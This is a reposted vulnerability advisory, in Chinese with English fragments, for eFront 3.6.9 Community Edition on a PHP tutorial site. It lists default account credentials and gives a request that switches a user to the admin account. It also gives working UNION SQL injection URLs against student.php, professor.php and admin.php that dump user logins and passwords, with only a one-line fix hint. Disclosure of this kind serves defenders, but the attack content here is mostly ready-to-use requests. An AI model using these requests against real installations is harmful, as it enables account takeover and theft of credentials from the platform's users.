来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: EFront = 3.6.9 Community Edition Multiple Vulnerabilities公共版: When 3.6.10 will be released作者: IHTeam www.2cto.com下载链接: http://www.efrontlearning.net/download/downloa......
|
标题: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities 公共版: When 3.6.10 will be released 作者: IHTeam www.2cto.com 下载链接: http://www.efrontlearning.net/download/download-efront.html 测试平台: efront_3.6.9_build11018 Default username and password: student:student professor:professor
怎么样变身管理员呢: Request 1: /change_account.php?login=admin Request 2: /userpage.php 或 simple use the [Switch account] option on top of the page; 好了,你已经进入管理区了;
SQL Injection: www.2cto.com /student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www.2cto.com /professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users -- www.2cto.com /admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
修复:验证严格 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
